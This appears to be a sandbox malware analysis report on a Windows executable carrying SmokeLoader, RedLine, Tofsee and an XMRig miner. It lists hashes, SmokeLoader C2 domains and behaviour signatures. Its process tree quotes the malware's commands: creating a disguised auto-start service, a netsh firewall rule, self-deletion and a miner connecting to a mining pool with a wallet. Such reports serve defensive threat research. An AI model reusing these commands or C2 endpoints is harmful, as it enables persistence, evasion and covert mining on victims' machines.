Overview

overview

10

Static

static

b6ca7f1169...ff.exe

windows7_x64

10

b6ca7f1169...ff.exe

windows10_x64

10

Analysis

  • max time kernel
    131s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    24-08-2021 22:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b6ca7f11696f8c92f087336db50badff.exe

  • Size

    270KB

  • MD5

    b6ca7f11696f8c92f087336db50badff

  • SHA1

    4535360e33b766a08a3dfa2627473a61c40e01b6

  • SHA256

    144b62852807332093289be1ce09dfe1f0cced88cf19f54537befbfbea053627

  • SHA512

    31d60231b46dc1422ae7c7773b88f5664e34962fd8f384ff36720d1b8eebdceb84f23a5e86dc3fd1023e035bc51ab17a2452c30b908c77202b782a3d6b08aed8

Score
10/10
redlinesmokeloadertofseexmrigbackdoorevasioninfostealerminerpersistencethemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/
rc4.i32
rc4.i32

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Themida packer 19 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6ca7f11696f8c92f087336db50badff.exe
    "C:\Users\Admin\AppData\Local\Temp\b6ca7f11696f8c92f087336db50badff.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1880
    • C:\Users\Admin\AppData\Local\Temp\b6ca7f11696f8c92f087336db50badff.exe
      "C:\Users\Admin\AppData\Local\Temp\b6ca7f11696f8c92f087336db50badff.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1912
  • C:\Users\Admin\AppData\Local\Temp\EF10.exe
    C:\Users\Admin\AppData\Local\Temp\EF10.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:328
  • C:\Users\Admin\AppData\Local\Temp\EFBD.exe
    C:\Users\Admin\AppData\Local\Temp\EFBD.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:340
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jwgytffi\
      2⤵
        PID:1420
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bwlvafxv.exe" C:\Windows\SysWOW64\jwgytffi\
        2⤵
          PID:564
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jwgytffi binPath= "C:\Windows\SysWOW64\jwgytffi\bwlvafxv.exe /d\"C:\Users\Admin\AppData\Local\Temp\EFBD.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1604
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description jwgytffi "wifi internet conection"
            2⤵
              PID:1576
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start jwgytffi
              2⤵
                PID:1960
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1508
              • C:\Users\Admin\AppData\Local\Temp\F46F.exe
                C:\Users\Admin\AppData\Local\Temp\F46F.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of AdjustPrivilegeToken
                PID:1116
              • C:\Users\Admin\AppData\Local\Temp\FB33.exe
                C:\Users\Admin\AppData\Local\Temp\FB33.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:1060
              • C:\Users\Admin\AppData\Local\Temp\FCDA.exe
                C:\Users\Admin\AppData\Local\Temp\FCDA.exe
                1⤵
                • Executes dropped EXE
                PID:1816
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start
                  2⤵
                    PID:1656
                  • C:\Windows\SysWOW64\notepad.exe
                    notepad.exe
                    2⤵
                      PID:1732
                  • C:\Users\Admin\AppData\Local\Temp\3DD.exe
                    C:\Users\Admin\AppData\Local\Temp\3DD.exe
                    1⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1536
                    • C:\Users\Admin\Documents\Update.exe
                      "C:\Users\Admin\Documents\Update.exe"
                      2⤵
                        PID:1340
                        • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                          "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                          3⤵
                            PID:2288
                          • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                            "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                            3⤵
                              PID:2344
                            • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                              "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                              3⤵
                                PID:2412
                              • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                3⤵
                                  PID:2428
                                • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                  "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                  3⤵
                                    PID:2500
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\3DD.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\3DD.exe"
                                  2⤵
                                    PID:1604
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 1.1.1.1 -n 1 -w 100
                                      3⤵
                                      • Runs ping.exe
                                      PID:2084
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 1.1.1.1 -n 1 -w 900
                                      3⤵
                                      • Runs ping.exe
                                      PID:2144
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:1288
                                  • C:\Windows\SysWOW64\jwgytffi\bwlvafxv.exe
                                    C:\Windows\SysWOW64\jwgytffi\bwlvafxv.exe /d"C:\Users\Admin\AppData\Local\Temp\EFBD.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1940
                                    • C:\Windows\SysWOW64\svchost.exe
                                      svchost.exe
                                      2⤵
                                        PID:936
                                        • C:\Windows\SysWOW64\svchost.exe
                                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                          3⤵
                                            PID:2912
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe
                                        1⤵
                                          PID:1088
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:300
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:920
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              1⤵
                                                PID:656
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe
                                                1⤵
                                                  PID:1068
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  C:\Windows\SysWOW64\explorer.exe
                                                  1⤵
                                                    PID:1588
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe
                                                    1⤵
                                                      PID:2192
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      1⤵
                                                        PID:2252

                                                      Network

                                                      MITRE ATT&CK Enterprise v6

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/300-127-0x000000006D431000-0x000000006D433000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/300-129-0x0000000000090000-0x0000000000097000-memory.dmp

                                                        Filesize

                                                        28KB

                                                        Download

                                                      • memory/300-130-0x0000000000080000-0x000000000008B000-memory.dmp

                                                        Filesize

                                                        44KB

                                                        Download

                                                      • memory/328-71-0x0000000000A90000-0x0000000000A91000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/328-84-0x00000000052B0000-0x00000000052B1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/340-83-0x0000000000220000-0x0000000000233000-memory.dmp

                                                        Filesize

                                                        76KB

                                                        Download

                                                      • memory/340-86-0x0000000000400000-0x00000000023AF000-memory.dmp

                                                        Filesize

                                                        31.7MB

                                                        Download

                                                      • memory/656-137-0x0000000000090000-0x0000000000095000-memory.dmp

                                                        Filesize

                                                        20KB

                                                        Download

                                                      • memory/656-138-0x0000000000080000-0x0000000000089000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/920-132-0x0000000000070000-0x0000000000079000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/920-133-0x0000000000060000-0x000000000006F000-memory.dmp

                                                        Filesize

                                                        60KB

                                                        Download

                                                      • memory/936-123-0x00000000000C0000-0x00000000000D5000-memory.dmp

                                                        Filesize

                                                        84KB

                                                        Download

                                                      • memory/1060-97-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1060-100-0x0000000000E60000-0x0000000000E61000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1068-140-0x0000000000070000-0x0000000000076000-memory.dmp

                                                        Filesize

                                                        24KB

                                                        Download

                                                      • memory/1068-141-0x0000000000060000-0x000000000006C000-memory.dmp

                                                        Filesize

                                                        48KB

                                                        Download

                                                      • memory/1088-117-0x0000000000070000-0x0000000000077000-memory.dmp

                                                        Filesize

                                                        28KB

                                                        Download

                                                      • memory/1088-118-0x0000000000060000-0x000000000006C000-memory.dmp

                                                        Filesize

                                                        48KB

                                                        Download

                                                      • memory/1116-85-0x000000001AE70000-0x000000001AE72000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/1116-77-0x0000000000D30000-0x0000000000D31000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1116-80-0x000007FEF38B0000-0x000007FEF39DC000-memory.dmp

                                                        Filesize

                                                        1.2MB

                                                        Download

                                                      • memory/1220-64-0x0000000003AB0000-0x0000000003AC6000-memory.dmp

                                                        Filesize

                                                        88KB

                                                        Download

                                                      • memory/1288-107-0x000000006EEA1000-0x000000006EEA3000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/1288-109-0x0000000000080000-0x00000000000EB000-memory.dmp

                                                        Filesize

                                                        428KB

                                                        Download

                                                      • memory/1288-108-0x00000000001D0000-0x0000000000244000-memory.dmp

                                                        Filesize

                                                        464KB

                                                        Download

                                                      • memory/1536-114-0x00000000011D0000-0x00000000011D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1536-119-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1588-164-0x0000000000080000-0x0000000000089000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/1588-161-0x0000000000090000-0x0000000000094000-memory.dmp

                                                        Filesize

                                                        16KB

                                                        Download

                                                      • memory/1732-166-0x00000000000A0000-0x00000000000A1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1880-63-0x0000000000230000-0x000000000023A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                        Download

                                                      • memory/1912-62-0x0000000075631000-0x0000000075633000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/1912-60-0x0000000000400000-0x0000000000409000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/1940-128-0x0000000000400000-0x00000000023AF000-memory.dmp

                                                        Filesize

                                                        31.7MB

                                                        Download

                                                      • memory/2192-179-0x00000000000E0000-0x00000000000E9000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/2192-178-0x00000000000F0000-0x00000000000F5000-memory.dmp

                                                        Filesize

                                                        20KB

                                                        Download

                                                      • memory/2252-191-0x0000000000080000-0x0000000000089000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/2252-187-0x0000000000090000-0x0000000000095000-memory.dmp

                                                        Filesize

                                                        20KB

                                                        Download

                                                      • memory/2288-206-0x0000000000F20000-0x0000000000F21000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2344-217-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2344-223-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2412-205-0x000000013F070000-0x000000013F071000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2412-229-0x000000001BB00000-0x000000001BB02000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/2412-226-0x000000001BFE0000-0x000000001C204000-memory.dmp

                                                        Filesize

                                                        2.1MB

                                                        Download

                                                      • memory/2428-213-0x000000013F830000-0x000000013F831000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2428-230-0x000000001BA40000-0x000000001BA42000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/2428-227-0x000000001BF80000-0x000000001C188000-memory.dmp

                                                        Filesize

                                                        2.0MB

                                                        Download

                                                      • memory/2500-228-0x0000000005A00000-0x0000000005A01000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2500-224-0x0000000001390000-0x0000000001391000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2912-231-0x00000000001F0000-0x00000000002E1000-memory.dmp

                                                        Filesize

                                                        964KB

                                                        Download